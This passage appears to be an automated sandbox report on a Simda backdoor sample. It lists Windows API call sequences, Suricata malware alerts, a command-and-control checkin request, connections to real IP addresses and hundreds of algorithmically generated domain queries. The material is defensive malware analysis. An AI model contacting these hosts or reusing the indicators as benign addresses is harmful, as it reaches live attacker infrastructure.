    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00887680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_00887680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089E6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,9_2_02BFDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,9_2_02BFDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF9910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_02BF9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BEE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BEE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_02BD7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB

    Networking

    Source: Network traffic, Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49708 -> 3.94.10.34:80
    Source: Network traffic, Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:56804
    Source: C:\Windows\apppatch\svchost.exe, Network Connect: 178.162.217.107 80
    Source: C:\Windows\apppatch\svchost.exe, Domain query: gatyvyz.com
    Source: C:\Windows\apppatch\svchost.exe, Domain query: lyvytud.com
    Source: C:\Windows\apppatch\svchost.exe, HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: unknown, DNS traffic detected: English language letter frequency does not match the domain names
    Source: unknown, DNS traffic detected: query: qexysig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvymaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
    Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrylix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowykuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexynol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahydyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacynow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8000
    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49730
    Source: unknownNetwork traffic detected: DNS query count 1003
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC4F80 IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02BC4F80
